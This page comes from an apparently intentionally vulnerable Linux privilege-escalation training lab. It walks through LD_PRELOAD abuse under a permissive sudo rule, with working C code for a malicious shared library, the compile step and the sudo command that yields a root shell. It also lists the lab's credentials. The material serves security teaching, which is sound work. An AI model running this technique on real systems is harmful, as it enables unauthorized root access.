🐧 Linux Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login SUID Binaries Sudo Misconfig Cron Jobs PATH Hijack Writable /etc/passwd Env Variables
⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo  |  alice / alice123  |  root / toor (goal: escalate to this)

Environment Variable Exploitation — LD_PRELOAD

PRIVILEGE ESCALATION 
# Scenario: sudo allows a program but env_keep includes LD_PRELOAD
# /etc/sudoers contains:
# Defaults env_keep+=LD_PRELOAD
# ram ALL=(ALL) NOPASSWD: /usr/sbin/apache2

# LD_PRELOAD loads a shared library before all others
# We create a malicious .so that spawns a shell

# Step 1: Write malicious C code (shell.c)
cat > /tmp/shell.c << EOF
#include 
#include 
#include 

void _init() {
    unsetenv("LD_PRELOAD");
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
EOF

# Step 2: Compile as shared library
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles

# Step 3: Run sudo with LD_PRELOAD pointing to our library
sudo LD_PRELOAD=/tmp/shell.so apache2
# Result: root shell spawned before apache2 even loads

# Also check for LD_LIBRARY_PATH abuse:
# If a SUID binary loads a shared library from a writable path,
# create a fake version of that library with _init() that spawns a shell